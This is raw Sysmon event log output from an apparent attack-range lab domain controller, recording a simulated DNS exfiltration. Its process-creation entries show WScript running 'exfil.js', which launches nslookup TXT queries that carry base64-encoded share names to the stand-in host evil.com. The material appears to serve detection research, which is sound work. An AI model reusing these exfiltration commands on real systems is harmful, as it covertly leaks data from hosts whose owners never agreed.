14:16:26.721{2E1864BB-17BA-629A-E53F-000000005F02}73406064C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-E63F-000000005F02}968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.721{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E63F-000000005F02}968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.721{2E1864BB-17BA-629A-E43F-000000005F02}74642380C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-E63F-000000005F02}968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.730{2E1864BB-17BA-629A-E63F-000000005F02}968C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-E43F-000000005F02}7464C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljsxjluh.tmp 2>&1 10341000x8000000000000000199048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.705{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-E53F-000000005F02}7340C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.705{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-E53F-000000005F02}7340C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.685{2E1864BB-17BA-629A-E53F-000000005F02}73406064C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-E43F-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000199045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.933{00000000-0000-0000-0000-000000000000}7144evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.846{00000000-0000-0000-0000-000000000000}2128evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.774{00000000-0000-0000-0000-000000000000}4832evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.693{00000000-0000-0000-0000-000000000000}3956evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.547{00000000-0000-0000-0000-000000000000}2260evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.471{00000000-0000-0000-0000-000000000000}2608evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000199039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.685{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E53F-000000005F02}7340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.685{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.685{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.668{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.668{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.668{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E43F-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.668{2E1864BB-17A1-629A-783D-000000005F02}55524580C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-E43F-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.683{2E1864BB-17BA-629A-E43F-000000005F02}7464C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljsxjluh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.668{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldub.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.637{2E1864BB-17BA-629A-E23F-000000005F02}73607304C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-E33F-000000005F02}3336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.637{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E33F-000000005F02}3336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.637{2E1864BB-17BA-629A-E13F-000000005F02}78045792C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-E33F-000000005F02}3336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.642{2E1864BB-17BA-629A-E33F-000000005F02}3336C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-E13F-000000005F02}7804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldub.tmp 2>&1 10341000x8000000000000000199022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.606{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-E23F-000000005F02}7360C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.606{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-E23F-000000005F02}7360C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 